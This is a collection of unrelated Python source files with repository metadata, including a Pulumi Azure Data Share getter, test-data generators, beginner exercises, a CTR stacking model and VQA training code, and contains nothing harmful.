from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetBlobDataSetResult',
'AwaitableGetBlobDataSetResult',
'get_blob_data_set',
]
@pulumi.output_type
class GetBlobDataSetResult:
"""
An Azure storage blob data set.
"""
def __init__(__self__, container_name=None, data_set_id=None, file_path=None, id=None, kind=None, name=None, resource_group=None, storage_account_name=None, subscription_id=None, system_data=None, type=None):
if container_name and not isinstance(container_name, str):
raise TypeError("Expected argument 'container_name' to be a str")
pulumi.set(__self__, "container_name", container_name)
if data_set_id and not isinstance(data_set_id, str):
raise TypeError("Expected argument 'data_set_id' to be a str")
pulumi.set(__self__, "data_set_id", data_set_id)
if file_path and not isinstance(file_path, str):
raise TypeError("Expected argument 'file_path' to be a str")
pulumi.set(__self__, "file_path", file_path)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if resource_group and not isinstance(resource_group, str):
raise TypeError("Expected argument 'resource_group' to be a str")
pulumi.set(__self__, "resource_group", resource_group)
if storage_account_name and not isinstance(storage_account_name, str):
raise TypeError("Expected argument 'storage_account_name' to be a str")
pulumi.set(__self__, "storage_account_name", storage_account_name)
if subscription_id and not isinstance(subscription_id, str):
raise TypeError("Expected argument 'subscription_id' to be a str")
pulumi.set(__self__, "subscription_id", subscription_id)
if system_data and not isinstance(system_data, dict):
raise TypeError("Expected argument 'system_data' to be a dict")
pulumi.set(__self__, "system_data", system_data)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="containerName")
def container_name(self) -> str:
"""
Container that has the file path.
"""
return pulumi.get(self, "container_name")
@property
@pulumi.getter(name="dataSetId")
def data_set_id(self) -> str:
"""
Unique id for identifying a data set resource
"""
return pulumi.get(self, "data_set_id")
@property
@pulumi.getter(name="filePath")
def file_path(self) -> str:
"""
File path within the source data set
"""
return pulumi.get(self, "file_path")
@property
@pulumi.getter
def id(self) -> str:
"""
The resource id of the azure resource
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def kind(self) -> str:
"""
Kind of data set.
Expected value is 'Blob'.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> str:
"""
Name of the azure resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroup")
def resource_group(self) -> str:
"""
Resource group of storage account
"""
return pulumi.get(self, "resource_group")
@property
@pulumi.getter(name="storageAccountName")
def storage_account_name(self) -> str:
"""
Storage account name of the source data set
"""
return pulumi.get(self, "storage_account_name")
@property
@pulumi.getter(name="subscriptionId")
def subscription_id(self) -> str:
"""
Subscription id of storage account
"""
return pulumi.get(self, "subscription_id")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> 'outputs.SystemDataResponse':
"""
System Data of the Azure resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> str:
"""
Type of the azure resource
"""
return pulumi.get(self, "type")
class AwaitableGetBlobDataSetResult(GetBlobDataSetResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetBlobDataSetResult(
container_name=self.container_name,
data_set_id=self.data_set_id,
file_path=self.file_path,
id=self.id,
kind=self.kind,
name=self.name,
resource_group=self.resource_group,
storage_account_name=self.storage_account_name,
subscription_id=self.subscription_id,
system_data=self.system_data,
type=self.type)
def get_blob_data_set(account_name: Optional[str] = None,
data_set_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
share_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetBlobDataSetResult:
"""
An Azure storage blob data set.
:param str account_name: The name of the share account.
:param str data_set_name: The name of the dataSet.
:param str resource_group_name: The resource group name.
:param str share_name: The name of the share.
"""
__args__ = dict()
__args__['accountName'] = account_name
__args__['dataSetName'] = data_set_name
__args__['resourceGroupName'] = resource_group_name
__args__['shareName'] = share_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:datashare/v20201001preview:getBlobDataSet', __args__, opts=opts, typ=GetBlobDataSetResult).value
return AwaitableGetBlobDataSetResult(
container_name=__ret__.container_name,
data_set_id=__ret__.data_set_id,
file_path=__ret__.file_path,
id=__ret__.id,
kind=__ret__.kind,
name=__ret__.name,
resource_group=__ret__.resource_group,
storage_account_name=__ret__.storage_account_name,
subscription_id=__ret__.subscription_id,
system_data=__ret__.system_data,
type=__ret__.type)
| [
"noreply@github.com"
] | morrell.noreply@github.com |
567fe246643d90abf4f7c5c8def3e5303b8e0179 | 76aa894988b3123306030240512c1e5039b2bc75 | /scripts/0123456789abcdef/scripts/test.py | a00e67ecd316ddd7fcd81238dbdad019b22636b8 | [] | no_license | puppycodes/powny | 4c2a554ed63c2f3a80a77ccefb491d00f951d877 | a5f20ff667c2f93b72b63865f70e25b26e6d4b30 | refs/heads/master | 2021-01-23T06:29:19.506593 | 2016-06-07T16:26:48 | 2016-06-07T16:26:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 630 | py | import urllib.request
from powny.core import (
expose,
save_job_state,
get_cas_storage,
)
# =====
@expose
def empty_method(**event):
pass
@expose
def do_urlopen(url, **_):
for _ in range(3):
urllib.request.build_opener().open(url)
save_job_state()
@expose
def failed_once(url):
save_job_state()
do_fail = get_cas_storage().replace_value(
path="failed_once_value",
value=False,
default=True,
)[0].value
if do_fail:
raise RuntimeError("A-HA-HA ANARCHY!!!111")
save_job_state()
urllib.request.build_opener().open(url)
return "OK"
| [
"mdevaev@gmail.com"
] | mdevaev@gmail.com |
e25ef155d81ca596891f43af8a1402d173ee151a | 3d705ec48c94373817e5f61d3f839988910431e3 | /lib/platform/dataprocess/spark_compute/makedata/peer_info.py | 3f6afbe05e41f38830ab26399afc5b95bae3bef5 | [] | no_license | namesuqi/zeus | 937d3a6849523ae931162cd02c5a09b7e37ebdd8 | 3445b59b29854b70f25da2950016f135aa2a5204 | refs/heads/master | 2022-07-24T14:42:28.600288 | 2018-03-29T08:03:09 | 2018-03-29T08:03:09 | 127,256,973 | 0 | 0 | null | 2022-07-07T22:57:57 | 2018-03-29T07:53:16 | Python | UTF-8 | Python | false | false | 3,470 | py | from lib.platform.dataprocess.spark_compute.test_data import *
from lib.platform.dataprocess.spark_compute.commontool.timestamp_conversion import *
import random
import os
class PeerInfo(object):
def make_data(self, hour=''):
data_format = '%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\n'
with open(os.path.abspath(os.path.dirname(__file__)) + '/peer_info.txt', 'w') as writer:
if hour == '':
for hour in range(24):
for minute in range(60):
topic = 'topic=' + 'peer_info'
id = "id=" + test_file_id[random.randint(0, len(test_file_id) - 1)] + ":" + str(
random.randint(1000, 1000000))
timestamp = 'timestamp=' + str(
TimestampConversion.get_timestamp(test_day + '%02d' % hour + '%02d' % minute))
input_time = 'input_time=' + str(long(timestamp.split('=')[1]) + 300)
output_time = 'output_time=' + str(long(timestamp.split('=')[1]) + 600)
peer_id = 'peer_id=' + test_peer_id[random.randint(0, len(test_peer_id) - 1)]
sdk_version = 'sdk_version=' + test_sdk_version[random.randint(0, len(test_sdk_version) - 1)]
nat_type = 'nat_type=' + str(random.randint(1, 4))
public_ip = 'public_ip=' + '10.5.100.1'
public_port = 'public_port=' + '8888'
private_ip = 'private_ip=' + '192.168.1.110'
private_port = 'private_port=' + '8080'
macs = 'macs=' + '9C-5C-8E-87-6A-25'
writer.write(data_format % (topic, id, timestamp, input_time, output_time, peer_id, sdk_version,
nat_type, public_ip, public_port, private_ip, private_port, macs))
else:
for minute in range(60):
topic = 'topic=' + 'peer_info'
id = "id=" + test_file_id[random.randint(0, len(test_file_id) - 1)] + ":" + str(
random.randint(1000, 1000000))
timestamp = 'timestamp=' + str(
TimestampConversion.get_timestamp("20160823" + '{:0>2}'.format(hour) + '%02d' % minute))
input_time = 'input_time=' + str(long(timestamp.split('=')[1]) + 300)
output_time = 'output_time=' + str(long(timestamp.split('=')[1]) + 600)
peer_id = 'peer_id=' + test_peer_id[random.randint(0, len(test_peer_id) - 1)]
sdk_version = 'sdk_version=' + test_sdk_version[random.randint(0, len(test_sdk_version) - 1)]
nat_type = 'nat_type=' + str(random.randint(1, 4))
public_ip = 'public_ip=' + '10.5.100.1'
public_port = 'public_port=' + '8888'
private_ip = 'private_ip=' + '192.168.1.110'
private_port = 'private_port=' + '8080'
macs = 'macs=' + '9C-5C-8E-87-6A-25'
writer.write(data_format % (topic, id, timestamp, input_time, output_time, peer_id, sdk_version,
nat_type, public_ip, public_port, private_ip, private_port, macs))
if __name__ == '__main__':
pi = PeerInfo()
pi.make_data('6')
| [
"suqi_name@163.com"
] | suqi_name@163.com |
124b6b6f688fe6ce26cff3df5a495cc90d430f4d | 556403cb93b2fdd464c3aef4cba4f1c3dc42e9d7 | /Python/ForLoop.py | 4e886ca3f9f96d620db34733d62e1450effea765 | [] | no_license | msivakumarm/PycharmProjects | 4d90a0105f334f2393d30fe46dc650808002b4fd | 7d84194a576f9ec8356ff272642d07dbddc48d42 | refs/heads/master | 2020-09-06T14:42:12.945424 | 2019-11-08T11:42:14 | 2019-11-08T11:42:14 | 219,989,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 598 | py | #print 0 to 9 numbers
for i in range(10): #bydefault starting value is 0
print(i) # 0 1 2 3 4 5 6 7 8 9
#print 1 to 10
for i in range(1,11):
print(i)
#print even numbers
for i in range(2,10,2): #initial value , max value , increment/decrement
print(i) # 2,4 ,6 ,8
#print odd numbers
for i in range(1,10,2): #initial value , max value , increment/decrement
print(i) # 1,3,5,7,9
#print 10 to 1 (descending order)
for i in range(10,1,-1):
print(i) # 10,9,8,7,6,5,4,3,2
fruits=['apple','banana','grape']
for val in fruits:
print(val)
else:
print("no fruits left") | [
"sivakumarm.mamillapalli@gmail.com"
] | sivakumarm.mamillapalli@gmail.com |
8b9167feeea3cb86a5059b7693f5777d6917802b | 8ed80561e1b3c0bcdb6201cae8af845d5da23edc | /guppe/exercicios_secao_4/ex_52.py | 03b73be3042b8d029004922244ad7e3f88b9bf58 | [] | no_license | Fulvio7/curso-python-guppe | 42d5a1ecd80c1f3b27dc3f5dad074a51c9b774eb | 98966963f698eb33e65ed58a84f96e28f675848a | refs/heads/main | 2023-08-28T13:31:12.916407 | 2021-10-09T19:03:17 | 2021-10-09T19:03:17 | 415,393,122 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | """
52- Três amigos jogaram na loteria. Caso eles ganhem, o prêmio deve
ser repartido proporcionalmente ao valor que cada um deu para a
realização da aposta. Faça um programa que leia quanto cada um investiu,
o valor do prêmio, e imprima quanto cada um ganharia do prêmio com base
no valor investido.
"""
print('===== LOTERIA DAORA =====')
premio_total = float(input('Digite o valor do prêmio: R$ '))
print('Digite o valor investido por cada apostador:')
aposta_jogador_1 = float(input('Jogador 1: R$ '))
aposta_jogador_2 = float(input('Jogador 2: R$ '))
aposta_jogador_3 = float(input('Jogador 3: R$ '))
total_apostado = aposta_jogador_1 + aposta_jogador_2 + aposta_jogador_3
premio_jogador_1 = (aposta_jogador_1 / total_apostado) * premio_total
premio_jogador_2 = (aposta_jogador_2 / total_apostado) * premio_total
premio_jogador_3 = (aposta_jogador_3 / total_apostado) * premio_total
print('Caso vocês ganhem, o resultado é o seguinte: ')
print(f'Prêmio jogador 1: R$ {premio_jogador_1:.2f}')
print(f'Prêmio jogador 2: R$ {premio_jogador_2:.2f}')
print(f'Prêmio jogador 3: R$ {premio_jogador_3:.2f}')
| [
"fulvio.barichello@gmail.com"
] | fulvio.barichello@gmail.com |
21131ff81ef9cdc75d8619c4d34ef8e46db5e505 | e000db56febfc79ee1586804265d11fca4adfe59 | /venv/Session10C.py | a2e284ab8113fcbc461a2760a8314be4f2161fd1 | [] | no_license | ishantk/PythonSep72018 | 2210bb1747752309eb5ef431988e2197e393cf2d | 5413c0061dd644166eeb3539d75b7404c6ea12d9 | refs/heads/master | 2020-03-28T06:11:41.991398 | 2018-11-19T12:08:55 | 2018-11-19T12:08:55 | 147,819,901 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | # import Session10B
# from Session10B import Employee
from Session10B import executeCode as ec
from Session10B import Employee as Emp
e = Emp()
print(e.sayHello())
# executeCode()
print("------")
ec()
print(e)
# print(e.__str__())
# print(e.__repr__()) | [
"er.ishant@gmail.com"
] | er.ishant@gmail.com |
0883e9291c134db423f5c47f4e0a3a398efa6b87 | eccbb87eefe632a1aa4eafb1e5581420ccf2224a | /July-kaggle/avazu-ctr-prediction/model_bak.py | 2002edbf0f47c4ffe558c3a8a29057ba79a16674 | [] | no_license | jianjunyue/python-learn-ml | 4191fc675d79830308fd06a62f16a23295a48d32 | 195df28b0b8b8b7dc78c57dd1a6a4505e48e499f | refs/heads/master | 2018-11-09T15:31:50.360084 | 2018-08-25T07:47:20 | 2018-08-25T07:47:20 | 102,184,768 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,404 | py | import numpy as np
import pandas as pd
# data precession
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import KFold
# model
from xgboost import XGBRegressor
# from lightgbm import LGBMRegressor
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor, AdaBoostRegressor
from sklearn.linear_model import LinearRegression
from sklearn.tree import DecisionTreeRegressor
# Initial setup
train_filename = "../../../data/avazu-ctr-prediction/train_small.csv"
test_filename = "../../../data/avazu-ctr-prediction/test"
submission_filename = "../../../data/avazu-ctr-prediction/sampleSubmission"
train_df = pd.read_csv(train_filename)
test_df = pd.read_csv(test_filename)
tcolumns="year,month,day,hours,C1,banner_pos,site_id,site_domain,site_category,app_id,app_domain,app_category,device_model,device_type,device_conn_type,C14,C15,C16,C17,C18,C19,C20,C21".split(",")
def get_data(data):
hour =data["hour"]
data["hours"]=(hour%100).astype(np.uint32)
hour=hour//100
data["day"]=(hour%100).astype(np.uint32)
hour = hour // 100
data["month"]=(hour%100).astype(np.uint32)
hour = hour // 100
data["year"]=(hour%100).astype(np.uint32)
for c in tcolumns:
if data[c].dtype=="object":
lbl = LabelEncoder()
lbl.fit(list(data[c].values))
data[c] = lbl.transform(list(data[c].values))
return data
train_df= get_data(train_df)
test_df= get_data(test_df)
x_train=train_df[tcolumns]
y_train=train_df[["click"]]
x_test=test_df[tcolumns]
# print(test_df['id'].astype(np.uint64))
#模型融合
class Ensemble(object):
def __init__(self, n_splits, stacker, base_models):
self.n_splits = n_splits
self.stacker = stacker
self.base_models = base_models
def fit_predict(self, X, y, T):
X = np.array(X)
y = np.array(y)
T = np.array(T)
folds = list(KFold(n_splits=self.n_splits, shuffle=True, random_state=2016).split(X, y))
S_train = np.zeros((X.shape[0], len(self.base_models)))
S_test = np.zeros((T.shape[0], len(self.base_models)))
for i, clf in enumerate(self.base_models):
S_test_i = np.zeros((T.shape[0], self.n_splits))
for j, (train_idx, test_idx) in enumerate(folds):
X_train = X[train_idx]
y_train = y[train_idx]
X_holdout = X[test_idx]
y_holdout = y[test_idx]
print("Fit Model %d fold %d" % (i, j))
clf.fit(X_train, y_train)
y_pred = clf.predict(X_holdout)[:]
S_train[test_idx, i] = y_pred
S_test_i[:, j] = clf.predict(T)[:]
S_test[:, i] = S_test_i.mean(axis=1)
# results = cross_val_score(self.stacker, S_train, y, cv=5, scoring='r2')
# print("Stacker score: %.4f (%.4f)" % (results.mean(), results.std()))
# exit()
self.stacker.fit(S_train, y)
res = self.stacker.predict(S_test)[:]
return res
# rf params
rf_params = {}
rf_params['n_estimators'] = 32
rf_params['max_depth'] = 8
rf_params['min_samples_split'] = 100
rf_params['min_samples_leaf'] = 30
# xgb params
xgb_params = {}
# xgb_params['n_estimators'] = 50
xgb_params['min_child_weight'] = 12
xgb_params['learning_rate'] = 0.37
xgb_params['max_depth'] = 6
xgb_params['subsample'] = 0.77
xgb_params['reg_lambda'] = 0.8
xgb_params['reg_alpha'] = 0.4
xgb_params['base_score'] = 0
# xgb_params['seed'] = 400
xgb_params['silent'] = 1
# RF model
rf_model = RandomForestRegressor(**rf_params)
# XGB model
xgb_model = XGBRegressor(**xgb_params)
stack = Ensemble(n_splits=3,
stacker=LinearRegression(),
base_models=(xgb_model,rf_model))
y_test = stack.fit_predict(x_train, y_train, x_test)
# 按照指定的格式生成结果
def create_submission(ids, predictions, filename=submission_filename):
# submission_df = pd.DataFrame({"id": ids, "click": predictions})
submission_df = pd.DataFrame(data={'aid' : ids, 'click': predictions})
print(submission_df.head())
# submission_df.to_csv(submission_filename+"_sub", header=['id', 'click'], index=False)
submission_df.to_csv(submission_filename + "_sub",index=False)
pre_df=pd.DataFrame(y_test,columns=["click"])
create_submission(test_df['id'].astype(np.uint64), pre_df["click"]) | [
"409494312@qq.com"
] | 409494312@qq.com |
55b52bf6e5b94c9f78ec06e048d71bd52b96f552 | d1aa7e50a50e6a3e44749644d164e19a6f8485f7 | /UpDn_vqa/train.py | 5afd5848bfd1d604f3b37fae3f4ca81d92b932fa | [] | no_license | qwjaskzxl/VQA | 12461f30780893ff8514bb6a17fcef1aba5ae224 | 705edeb0b80a7e301add2268d87470a02f3ab258 | refs/heads/master | 2020-12-10T13:07:19.112014 | 2020-03-03T12:20:02 | 2020-03-03T12:20:02 | 233,603,008 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,752 | py | import os
import time
import torch
import torch.nn as nn
import utils
from torch.autograd import Variable
def instance_bce_with_logits(logits, labels):
assert logits.dim() == 2
loss = nn.functional.binary_cross_entropy_with_logits(logits, labels)
loss *= labels.size(1)
return loss
def compute_score_with_logits(logits, labels):
logits = torch.max(logits, 1)[1].data # argmax
one_hots = torch.zeros(*labels.size()).cuda()
one_hots.scatter_(1, logits.view(-1, 1), 1)
scores = (one_hots * labels)
return scores
def train(model, train_loader, eval_loader, num_epochs, output):
utils.create_dir(output)
optim = torch.optim.Adamax(model.parameters())
logger = utils.Logger(os.path.join(output, 'log.txt'))
best_eval_score = 0
for epoch in range(num_epochs):
total_loss = 0
train_score = 0
t = time.time()
for i, (v, b, q, a) in enumerate(train_loader):
v = Variable(v).cuda()
b = Variable(b).cuda()
q = Variable(q).cuda()
a = Variable(a).cuda()
pred = model(v, b, q, a)
loss = instance_bce_with_logits(pred, a)
loss.backward()
nn.utils.clip_grad_norm(model.parameters(), 0.25)
optim.step()
optim.zero_grad()
batch_score = compute_score_with_logits(pred, a.data).sum()
total_loss += loss.item() * v.size(0)
train_score += batch_score
total_loss /= len(train_loader.dataset)
train_score = 100 * train_score / len(train_loader.dataset)
model.train(False)
eval_score, bound = evaluate(model, eval_loader)
model.train(True)
logger.write('epoch %d, time: %.2f' % (epoch, time.time()-t))
logger.write('\ttrain_loss: %.2f, score: %.2f' % (total_loss, train_score))
logger.write('\teval score: %.2f (%.2f)' % (100 * eval_score, 100 * bound))
if eval_score > best_eval_score:
model_path = os.path.join(output, 'model.pth')
torch.save(model.state_dict(), model_path)
best_eval_score = eval_score
def evaluate(model, dataloader):
score = 0
upper_bound = 0
num_data = 0
for v, b, q, a in iter(dataloader):
v = Variable(v, volatile=True).cuda()
b = Variable(b, volatile=True).cuda()
q = Variable(q, volatile=True).cuda()
pred = model(v, b, q, None)
batch_score = compute_score_with_logits(pred, a.cuda()).sum()
score += batch_score
upper_bound += (a.max(1)[0]).sum()
num_data += pred.size(0)
score = score / len(dataloader.dataset)
upper_bound = upper_bound / len(dataloader.dataset)
return score, upper_bound
| [
"870384605@qq.com"
] | 870384605@qq.com |
e7706c9c880387da59ac49f8aa30a68916b0a45d | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /T3p8AkyXcE9ALkWbA_9.py | 064d3b2bb82263a46190b538dd1a0cef90d0e288 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 702 | py | """
Given a sandwich (as a _list_ ), return a list of fillings inside the
sandwich. This involves **ignoring** the first and last elements.
### Examples
get_fillings(["bread", "ham", "cheese", "ham", "bread"]) ➞ ["ham", "cheese", "ham"]
get_fillings(["bread", "sausage", "tomato", "bread"]) ➞ ["sausage", "tomato"]
get_fillings(["bread", "lettuce", "bacon", "tomato", "bread"]) ➞ ["lettuce", "bacon", "tomato"]
### Notes
The first and last elements will always be `"bread"`.
"""
def get_fillings(sandwich):
#Given a sandwich (as a list), return a list of fillings inside the sandwich.
#This involves ignoring the first and last elements.
return sandwich[1:-1]
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
86cd3845af903809196a1520a7ec45b2e8b97071 | 66eb164d6db38c7e25949179025b0f9afc8887c8 | /midterm/task1/main/views.py | 0fc78fcab702bf3363f45bb1808c62641d6e8ab8 | [] | no_license | akbota123/BFDjango | 89c273c68464768ddbc1fbd7253fad59e071feb0 | 0209486f3fe74158f5768933b583bc328f578186 | refs/heads/master | 2020-03-28T02:50:45.374114 | 2018-11-25T08:11:59 | 2018-11-25T08:11:59 | 147,601,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,215 | py | from django.shortcuts import render, redirect
from django.http import HttpResponse
from datetime import datetime, timedelta
from .models import User, Restaurant, Review, Dish, RestaurantReview, DishReview
from .forms import UserForm, RestaurantForm, DishForm, ReviewForm
from django.contrib.auth.decorators import login_required
# Create your views here.
def home(request):
return render(request, 'home.html')
@login_required
def resta(request):
resta=Restaurant.objects.all()
context={'Restaurant':resta}
return render(request, 'restaurant.html', context)
def resta_filter(request, rf):
resta_f=Restaurant.objects.order_by(rf)
context={'Restaurant':resta_f}
return render(request, 'restaurant.html', context)
@login_required
def resta_add(request):
if request.method=='POST':
form=RestaurantForm(request.POST)
if form.is_valid():
form.save()
return redirect('restaurant')
else:
form=RestaurantForm()
context={'form':form}
return render(request, 'new.html', context)
@login_required
def dish(request):
meal=Dish.objects.all()
context={'Dish', meal}
return render(request, 'dish.html', context)
| [
"akbota.mamadyarova98@gmail.com"
] | akbota.mamadyarova98@gmail.com |
e47fed16f9926c78b145bcf701a21250ca615ad4 | 1e9c67785cd2a07fbd12b63bd93a2eba2272f237 | /image_task_classif/batch_util_classif.py | 61b5d4ffde0b566ae90f6a25bd11e0afa531f23c | [] | no_license | monisha-jega/mmd | 2975d0f77bce4db38795fa201f515f35498f0eb3 | d4f9d2c94409c2877ff5a5a2242e7e7ed2f87921 | refs/heads/master | 2022-07-20T17:01:39.043859 | 2020-05-16T23:31:35 | 2020-05-16T23:31:35 | 264,543,426 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,717 | py | import numpy as np
from parameters_classif import *
import pickle
from annoy import AnnoyIndex
if use_images == True:
#Load annoy file for image representations
url_to_index = pickle.load(open(annoy_dir+"ImageUrlToIndex.pkl", 'rb'))
#print(type(url_to_index))
#print(url_to_index)
a = AnnoyIndex(image_size)
a.load(annoy_dir+'annoy.ann')
#print(a.get_n_items())
#print(a.get_item_vector(0), a.get_item_vector(1), a.get_item_vector(2))
print("annoy file loaded")
def image_rep(image_url):
v = np.array([0 for e in range(image_size)])
if image_url in ["", 'RANDOM']:
return np.array(v)
try:
index = url_to_index[image_url.strip()]
v = np.array(a.get_item_vector(index))
except:
if use_images == True:
print(image_url + " exception loading from annoy")
return v
def pad_for_batch_size(batch_images, batch_gender_targets, batch_color_targets, batch_mat_targets):
if(len(batch_images) != batch_size):
pad_size = batch_size - len(batch_images)%batch_size
empty_data_mat = ["RANDOM" for i in range(pad_size)]
empty_data_mat = np.array(empty_data_mat)
batch_images = np.vstack((batch_images, empty_data_mat))
empty_data_mat = [num_gender_classes for i in range(pad_size)]
empty_data_mat = np.array(empty_data_mat)
batch_gender_targets = np.vstack((batch_gender_targets, empty_data_mat))
empty_data_mat = [0 for i in range(pad_size)]
empty_data_mat = np.array(empty_data_mat)
batch_color_targets = np.vstack((batch_color_targets, empty_data_mat))
empty_data_mat = [0 for i in range(pad_size)]
empty_data_mat = np.array(empty_data_mat)
batch_mat_targets = np.vstack((batch_mat_targets, empty_data_mat))
return batch_images, batch_gender_targets, batch_color_targets, batch_mat_targets
def process_batch(data_batch):
batch_images = []
batch_gender_targets_list = []
batch_color_targets_list = []
batch_mat_targets_list = []
for instance in data_batch:
batch_images.append(instance[0])
batch_gender_targets_list.append(instance[1])
batch_color_targets_list.append(instance[2])
batch_mat_targets_list.append(instance[3])
batch_images, batch_gender_targets_list, batch_color_targets_list, batch_mat_targets_list = pad_for_batch_size(batch_images, batch_gender_targets_list, batch_color_targets_list, batch_mat_targets_list)
batch_images = [image_rep(image) for image in batch_images]
return batch_images, batch_gender_targets_list, batch_color_targets_list, batch_mat_targets_list
| [
"monishaj@Monishas-MacBook-Pro.local"
] | monishaj@Monishas-MacBook-Pro.local |
34055a4fe950c03e9b14fbf71245f7018cd9a95f | 07bae7671cac165fb91554343396ee1343c6363d | /function1/function11.py | 6270f172902973c8623b78a4b6be14ec8266b9d7 | [] | no_license | quyixiao/python_lesson | 7869dfd3aec8f5b6500ae955ae5c50a956f7b4c3 | 81684d06e6f054049fa79b0e63ab528bdc46581f | refs/heads/master | 2021-06-28T08:01:02.937679 | 2021-03-11T10:29:57 | 2021-03-11T10:29:57 | 221,687,833 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 803 | py | def foo(xyz=None,u = 'abc',z = 123):
if xyz is None:
xyz = []
xyz.append(1)
print(xyz)
return xyz
foo()
print(1,foo.__defaults__)
foo()
print(2,foo.__defaults__)
foo([10])
print(3,foo.__defaults__)
foo([10,5])
print(4,foo.__defaults__)
lst = [5]
lst = foo(lst)
print(lst)
print(5,foo.__defaults__)
# 默认值的作用域
# 每一种方式
# 使用影子拷贝创建一个新的对象 ,永远不能改变传入的参数
# 第二种方式
# 通过值的判断就可以灵活的选择,
# 这种方法灵活,应用广泛
# 很多的函数的定义,都可以看到,如果传入的是非null,那么惯用的用法,
# 使用nonlocal关键字,将变量标记为在上级的局部的作用域中定义,但是不能是全局的作用域中定义,
# 属性_defaults_
| [
"2621048238@qq.com"
] | 2621048238@qq.com |
5f032aa8c9470c0b7a0d2698e0f484ed42feb7cc | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_exercises/templates/_algorithms_challenges/pybites/intermediate/35_v5/top_n.py | fc535d7af4fae5ca8aea70499c63cf182862e79f | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 1,234 | py | # ____ d__ _______ d__
# _______ h__
# ____ o.. _______ attrgetter
#
# numbers [0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5, -6, 6]
# dates d__(2018, 1, 23, 0, 0),
# d__(2017, 12, 19, 0, 0),
# d__(2017, 10, 15, 0, 0),
# d__(2019, 2, 27, 0, 0),
# d__(2017, 3, 29, 0, 0),
# d__(2018, 8, 11, 0, 0),
# d__(2018, 5, 3, 0, 0),
# d__(2018, 12, 19, 0, 0),
# d__(2018, 11, 19, 0, 0),
# d__(2017, 7, 7, 0, 0
# # https://www.forbes.com/celebrities/list
# earnings_mln
# {'name': 'Kevin Durant', 'earnings': 60.6},
# {'name': 'Adele', 'earnings': 69},
# {'name': 'Lionel Messi', 'earnings': 80},
# {'name': 'J.K. Rowling', 'earnings': 95},
# {'name': 'Elton John', 'earnings': 60},
# {'name': 'Chris Rock', 'earnings': 57},
# {'name': 'Justin Bieber', 'earnings': 83.5},
# {'name': 'Cristiano Ronaldo', 'earnings': 93},
# {'name': 'Beyoncé Knowles', 'earnings': 105},
# {'name': 'Jackie Chan', 'earnings': 49},
#
#
#
# ___ get_largest_number numbers n_3
# r.. h__.n.. ? ?
#
#
# ___ get_latest_dates dates n_3
# r.. h__.n.. ? ?
#
#
# ___ get_highest_earnings earnings_mln n_3
# r.. h__.n.. ? ? k.._l.... x| ? 'earnings'
| [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
559cc23ee0088ba255f51cac038b41d9882f11cc | 2eab4a6fa0b525dc49fe06fd3c8f4e56dabe2ad2 | /python/Calculate Fibonacci return count of digit occurrences.py | f7180023010e239d0de95d1cb3b45a34f5c8b4ea | [] | no_license | bthowe/codewars | 6563aa2c49bb876d3945620a27f95940f75130c6 | fea2593c24b9e7f89ee33d1afb31581364e6f567 | refs/heads/master | 2020-07-01T02:59:35.113100 | 2017-02-06T19:57:34 | 2017-02-06T19:57:34 | 74,102,013 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | from collections import Counter
def fib(n):
n0 = 0
n1 = 1
count = 1
while count<n:
n2 = n0 + n1
n0 = n1
n1 = n2
count+=1
if n==0:
return 0
elif n==1:
return 1
else:
return n2
def fib_digits(n):
fib_num = fib(n)
return sorted([(v, int(k)) for k, v in dict(Counter(str(fib_num))).iteritems()])[::-1]
# print Counter(str(fib_num)).items()
